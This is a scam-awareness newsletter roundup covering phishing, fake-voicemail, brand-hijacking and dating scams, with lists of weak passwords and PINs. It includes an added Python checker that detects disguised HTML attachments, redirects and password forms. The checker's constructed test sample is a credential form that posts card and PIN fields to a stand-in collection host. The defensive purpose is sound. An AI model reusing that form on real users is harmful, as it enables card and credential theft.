When the victim gets notified by the bank that the check they deposited is a fake, the scammers are long gone with the $2,500. They move around and are hard to track down. Remember: If it is too good to be true, it most likely is.

 

Changes to Microsoft Services Agreement

This new official-looking email currently making the circuit claims to be from Microsoft, but the links in it point to a webserver in Minsk, Belarus (Microsoft is headquartered in Redmond, Washington). The links may or may not take you to an assortment of prime Russian perfumes available for purchase, but will probably also infect your PC with some nasty malware. As always: don't fall for it. Delete the message from the Inbox, and make sure you clean out your Deleted Messages folder as well.

 

You Have Been Targeted for Assassination

Yup, no kidding! Some of the cybercrime gangs have pulled out all the stops and gone into 'full threat mode'. They actually have been at this for a while, and every month they must be sitting down and deciding what sort of stupid but scary threat they will cook up now to keep their scam from "going stale".

Over the last few weeks, the Internet Crime Complaint Center (IC3) reported that it received complaints about the latest version of the 'Hit Man Scam', which now tells people via e-mail they have been targeted for assassination. The complainants told IC3 that the email wants them to buy a security alarm so they can use that if they see suspicious activity.

The e-mails were signed by Agent Bauer (remember "24" on TV?) of the fictional International Intelligence Bureau. It is always surprising how many people go into panic mode and start clicking on links to avoid a negative consequence.

While most people know such an email is a hoax, the scammers obviously find enough people that respond to make it worthwhile for them to keep the scam going.

 

Easy Password/PIN Hacking - courtesy of Forbes Magazine

If you see your password below, STOP and immediately go change your password -- before you forget! You will probably make changes in several places since passwords tend to be reused for multiple accounts. Don't make it too easy to remember, because you are also making it too easy for someone to guess. This is a chart of the 25 worst passwords of 2011:

password 123456 12345678 qwerty abc123
monkey 1234567 letmein trustno1 dragon
baseball 111111 iloveyou master sunshine
ashley bailey passw0rd shadow 123123
654321 superman qazwsx michael football


This is a link to a Microsoft website that will rate your password strength. Click Here! It is always recommended that you do not use birthdays, kids' names, or pet names as passwords, and that you occasionally substitute numbers, capital letters or special characters into your password to make it stronger. For example, the password "wednesday" could be strengthened into "Wedn3$day".

And just as bad are the weak PIN codes people often set on their ATM/debit/credit cards. If you were to happen to lose your card somewhere, these are the first combinations that a criminal would try to access your account. These are the 20 worst PIN code combinations:

1234 1111 0000 1212 7777
1004 2000 4444 2222 6969
9999 3333 5555 6666 1122
1313 8888 4321 2001 1010


Notably, the 22nd most common PIN code is "2580", which is the middle column of buttons on most ATM keypads.

 

Customer Satisfaction Survey

If the bad guys would use their energy and inventiveness in a more productive way, the world economy would be a lot healthier. So this week, there is a popular social engineering attack doing the rounds where people get promised a $50 or EUR50 voucher/gift certificate if they answer a quick 5-question customer satisfaction survey. Major brands are used; in Europe it's Tesco and Woolworth. The attack is launched via Facebook.

Two other scams are also worth mentioning. To start with, an email disguised as a voicemail notification from Microsoft Exchange Server tries to get users to double click a link to listen to the voicemail. The second one is an email that appears to come from the FDIC and tries to get users to follow a link to download "a new security version."

RedFlags (Adobe PDF)

 

Email with "Visual Voicemail" - Brought to you by the Better Business Bureau

Keep a careful eye on your work email this week! Fake "visual voicemail" emails are making the rounds. These emails appear to contain a new voicemail message, but click the attachment and you'll end up at a scam website.

This is a new approach that we've not seen at BBB before. The scammers probably hope that the novelty of it will make you curious enough to click on the link. Don't do it!

How the Scam Works:

The emails appear to come from Microsoft Outlook on "Behalf of an Anonymous Caller," but the messages reference a variety of URLs and phone numbers. Of the cases we've seen, employees are receiving emails that contain an "Email ID" (see screen shot below) that appears to be from an internal company email address. For example, an employee at business ABC would receive a message citing email ID "voice.mail@ABC.com."

However, the one thing certain about scams is that they will change. Watch out for new variations on the theme. For example, we have seen multiple emails with a fake voicemail from a 703 (Northern Virginia) area code and from BBB.org email addresses. But scammers are likely to change this up.

Don't Click the Attachment:

The email attachment appears to be a .wav audio file, but it's really an HTML link that redirects recipients to a malicious website. The destination website may download malware to scan for banking and other sensitive information on your computer.

 

Fake AmEx "Security Verification"

Phishing attacks come in waves. Old ones get "refurbished" and sent out again after several months. Shiny new ones are cooked up all the time. Sometimes you see hybrids of old and new, and that's what is doing the rounds at the moment. Remind your friends and co-workers that they need to delete these types of phishing attacks and not click on any unsubscribe links!

The attack tries to make recipients open the file in the attachment and fill out a detailed screen. The email claims to be a notification about a "Membership Security Verification," and warns the recipient that a "slight error" has been detected in their AmEx accounts. To correct the error and prevent their account from getting shut down in the next 48 hours - the recipient is urged to download the attached HTML file, open it in a browser and fill out a boatload of information.

In this case, the criminals go whole hog and want it all: username, address, home and work telephone numbers, SSN#, mother's maiden name and date of birth, users' date of birth, AmEx credit card number, expiry date, card security code, ATM PIN, email address and the password for it. Obviously all this submitted data gets sent to the criminal mothership and sold to the highest bidder!
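
Both the fake voicemail described earlier and this AmEx message depend on an attachment whose contents do the work once opened. The following Python check is an added example, not code from the BBB or any mail product: it parses a message with the standard email library and flags attachments that claim to be .wav audio but are not, HTML that redirects on open, and HTML forms that ask for a password. The sample messages and .example addresses are constructed.

```python
import re
from email import message_from_bytes, policy
from email.message import EmailMessage

HTML_HINT = re.compile(rb"<\s*(!doctype\s+html|html|head|body|meta|script|form)\b", re.I)
REDIRECT = re.compile(rb"http-equiv\s*=\s*[\"']?refresh|location\.(href|replace)", re.I)
CRED_FORM = re.compile(rb"<\s*form\b.*?<\s*input\b[^>]*type\s*=\s*[\"']?password", re.I | re.S)


def is_wav(data: bytes) -> bool:
    """A real WAV file is a RIFF container: 'RIFF', 4-byte size, then 'WAVE'."""
    return data[:4] == b"RIFF" and data[8:12] == b"WAVE"


def inspect_attachments(raw: bytes) -> dict:
    """Map each attachment filename in a raw message to a list of findings."""
    msg = message_from_bytes(raw, policy=policy.default)
    report = {}
    for part in msg.iter_attachments():
        name = part.get_filename() or "(unnamed)"
        data = part.get_payload(decode=True) or b""
        lower = name.lower()
        looks_html = bool(HTML_HINT.search(data[:4096]))
        claims_audio = lower.endswith(".wav") or part.get_content_maintype() == "audio"
        findings = []
        if claims_audio and not is_wav(data):
            findings.append("declared audio, content is not RIFF/WAVE")
        if looks_html and not lower.endswith((".html", ".htm")):
            findings.append("HTML content behind a non-HTML name")
        if looks_html and REDIRECT.search(data):
            findings.append("redirects the browser on open")
        if looks_html and CRED_FORM.search(data):
            findings.append("form asks for a password")
        report[name] = findings
    return report


def build_sample(filename: str, maintype: str, subtype: str, body: bytes) -> bytes:
    """Build a constructed test message with one attachment."""
    m = EmailMessage()
    m["From"] = "voice.mail@abc.example"
    m["To"] = "employee@abc.example"
    m["Subject"] = "Constructed sample"
    m.set_content("You have a new message.")
    m.add_attachment(body, maintype=maintype, subtype=subtype, filename=filename)
    return m.as_bytes()


# Constructed samples: HTML posing as audio, an HTML form, and a genuine WAV header.
FAKE_WAV = build_sample("message.wav", "audio", "wav",
    b'<html><head><meta http-equiv="refresh" content="0; url=http://redirect.example/">'
    b"</head></html>")
HTML_FORM = build_sample("verification.html", "text", "html",
    b'<html><body><form action="http://collect.example/"><input type="text" name="card">'
    b'<input type="password" name="pin"></form></body></html>')
REAL_WAV = build_sample("greeting.wav", "audio", "wav",
    b"RIFF\x24\x00\x00\x00WAVEfmt " + b"\x00" * 28)

if __name__ == "__main__":
    for sample in (FAKE_WAV, HTML_FORM, REAL_WAV):
        print(inspect_attachments(sample))
```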

 

Naked Prince Harry Pictures

Watch out for the latest Internet craze. The bad guys are having a field day with a post from celeb gossip website TMZ, which looked like pictures of Prince Harry caught playing "strip billiards" in a Las Vegas hotel suite with a bunch of party girls. Prince Harry is many a young woman's dream, and a lot of your users may feel tempted to see what all the excitement is about. Please warn your employees and friends. Cybercriminals are taking advantage of 'breaking news' celeb stories; there are examples enough: Michael Jackson, Amy Winehouse, Rihanna sex videos or a claimed video of the Osama Bin Laden killing. Remind your friends and family members not to fall for these social engineering tricks!

What Is Wrong With This Picture?

This picture is a screen shot from the Polish TV Channel TVP. See something that should not be there on the whiteboard? Here is a hint: Haslo is Polish for "Password". The two screen shots are on the KnowBe4 Blog, with a suggestion of what to do when a TV crew visits your office.

 
Big Brand Hijacking

A customer reported a fresh scam. The bad guys are getting quite inventive, especially with big brands. They are now causing confusion using the UPS logo with a phishing attack on both employees and people at the house. Have you ever noticed that when people get confused, they go blank for a moment? That is what the phishers are consciously exploiting: "Did I really send something that day? Perhaps it was another day and they got it wrong? What -is- this?" ~CLICK~

Big brand hijacking is extremely popular with phishers these days. Be especially careful when you get emails that use the following brands: UPS, FedEx, Amazon, DHL, Verizon Wireless, Internal Revenue Service, Better Business Bureau, Bank of America, and Facebook. Just the FedEx brand alone is 'stolen' daily and used in 1-5 million (!) phishing emails.
 
Tech Support Scams

Telemarketing scams come in waves. In the past it was time-share condos, but now we hear horror stories about boiler rooms pushing tech support. People get harassed with phone calls at the most inconvenient hours from callers posing as Microsoft employees and trying to scam them into some kind of PC security service, on the claim that their machine is infected with malware.

So, please let your friends know that phone scammers with foreign accents try to social engineer people to pay with credit cards and PayPal for services that they don't need!
 
Olympics Scam Roundup

Olympic organizers recorded 124 different scams so far but expect double or more. First, there is an "Invitation FACEBOOK - Olympic Torch" chain letter. It claims that your machine will be infected with malware but the whole thing is a hoax. Think before you click and do not forward.

Next, scammers prey on Olympics Mobile game players. Not long ago, organizers of this year's Olympic Games released London 2012 - Official Mobile Game, a fun smartphone app for Android, iOS, and Blackberry users. But there are a few Russian websites claiming to be legitimate app markets and they host malware claiming to be the official London 2012 game. Be very careful downloading games for your smartphone.

Then, there is a blizzard of bogus Olympics-themed emails that try to steal money and/or information. They offer fake last-minute tickets, memorabilia, tell you that you have won an "Olympic lottery" or that you can sign up for temp jobs online and make some extra money. These scam emails use well known brands, or even spoof the London Olympics. Delete all of these immediately.

Especially do not click on any emails with pictures or videos about the Olympics, because clicking on one of these has a very high chance to infect your workstation with malware. Even search results on Google could be infected links so be careful.

Last but not least, be particularly wary of text messages on your phone that claim a gold medal win, or something else 'exciting'. The safe way to get information about the Olympics online is to go to their official website.
 
Online Dating

Beware, another honey trap is doing the rounds trying to snare people. This is something you could forward to all your friends as a good example of social engineering they should not fall for.

Russian online dating scammers are currently spamvertising a fraudulent campaign attempting to socially engineer users into interacting with a bogus online dating service. What we have here is a recent example of one of the most prolific online scams, namely, Russian dating scams. The scam revolves around the notion that lonely Internet users will engage in emotional and financial transactions with complete strangers based on their profiles and associated photos promising love, marriage, or friendship. The idea is to have users click on the link to a webcam or other services, but clicking on links like that is fraught with all kinds of risk.